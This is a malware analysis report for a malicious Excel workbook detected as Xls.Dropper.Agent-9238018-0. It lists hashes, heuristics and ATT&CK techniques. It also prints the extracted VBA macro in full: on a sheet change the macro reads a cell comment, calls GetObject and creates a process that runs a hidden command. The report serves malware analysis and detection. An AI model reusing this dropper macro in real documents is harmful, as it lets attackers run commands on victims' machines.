Xls.Dropper.Agent-9238018-0 Office (OOXML) malware analysis — malicious · 53604dccd6756ae1

MALICIOUS

Office (OOXML)

80.7 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-07

MD5: 5521a14421fbf76c3696f8b52fd300fb SHA-1: 40261e933ad21244a03485b01df36a2c2547f4d1 SHA-256: 53604dccd6756ae1de7afd13bd052ded0a41497ac718118bf2c8a9aa33bf88c9

180 Risk Score

Malware Insights

Xls.Dropper.Agent-9238018-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-9238018-0. Static analysis reveals the presence of VBA macros, specifically a GetObject call within the Workbook_Activate and Worksheet_Change subroutines. This suggests the macro is designed to execute a secondary payload, likely by leveraging the GetObject function to run external code.

Heuristics 3

ClamAV: Xls.Dropper.Agent-9238018-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-9238018-0
VBA project inside OOXML medium 1 related finding OOXML_VBA

Document contains a VBA project — VBA macros present
GetObject call high OLE_VBA_GETOBJ

GetObject call

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1104 bytes
SHA-256: `d154053d78b58f6e4e342586f821e33f674801ac2d8096e8fc42056e49f9bab3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() Range("A500").Value = 3.14159 End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Sub Worksheet_Change(ByVal target As Range) Dim xxWk, RoVzT, Ovbvaf xxWk = ThisWorkbook.ActiveSheet.Range("C500").Comment.Text RoVzT = Split(xxWk, "<.>") Ovbvaf = pIwFg(RoVzT(1), RoVzT(0)) End Sub Function pIwFg(A2, A1) Dim jlvrPtx, IqVgLXmH, rSol, intProcessID Set jlvrPtx = GetObject(A1) IqVgLXmH = A2 rSol = jlvrPtx.Create(IqVgLXmH, Null, Null, intProcessID) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	17408 bytes
SHA-256: `91e5dd3e20d6c909df5f515e0514b079e9b537e285c9bb0c853c9e418e92710b`
Detection ClamAV: Xls.Dropper.Agent-9238018-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.